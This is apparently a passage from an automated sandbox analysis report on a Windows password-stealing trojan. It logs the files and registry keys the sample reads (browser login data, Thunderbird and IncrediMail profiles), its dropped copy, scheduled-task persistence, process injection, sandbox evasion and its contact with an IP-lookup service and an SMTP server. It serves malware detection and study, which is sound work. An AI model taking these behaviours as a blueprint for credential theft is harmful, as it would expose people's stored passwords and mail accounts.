                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Users\user\AppData\Roaming\lnYkIr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Users\user\AppData\Roaming\lnYkIr.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3365723059.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3368803671.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3368803671.0000000003287000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3368803671.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3368762224.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lnYkIr.exe PID: 7708, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    3
                    Obfuscated Files or Information
                    Security Account Manager521
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets151
                    Virtualization/Sandbox Evasion
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1391079 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 12/02/2024 Architecture: WINDOWS Score: 100 42 us2.smtp.mailhostbox.com 2->42 44 ip-api.com 2->44 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Sigma detected: Scheduled temp file as task from temp location 2->54 56 11 other signatures 2->56 8 SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe 7 2->8         started        12 lnYkIr.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Roaming\lnYkIr.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmp9C71.tmp, XML 8->40 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 70 2 other signatures 8->70 14 SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        64 Multi AV Scanner detection for dropped file 12->64 66 Machine Learning detection for dropped file 12->66 68 Injects a PE file into a foreign processes 12->68 24 lnYkIr.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 46 ip-api.com 208.95.112.1, 49728, 49732, 80 TUT-ASUS United States 14->46 48 us2.smtp.mailhostbox.com 208.91.198.143, 49729, 49735, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->48 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        72 Tries to steal Mail credentials (via file / registry access) 24->72 74 Tries to harvest and steal browser information (history, passwords, etc) 24->74 36 conhost.exe 26->36         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                    SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\lnYkIr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\lnYkIr.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                    http://ocsp.sectigo.com0A0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://crl.usertr0%Avira URL Cloudsafe
                    http://ocsp.usertru0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    208.91.198.143
                    truefalse
                      high
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        fp2e7a.wpc.phicdn.net
                        192.229.211.108
                        truefalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://ocsp.sectigo.com0ASecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://ip-api.com/line/?fields=hostingyi;lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://sectigo.com/CPS0SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpfalse
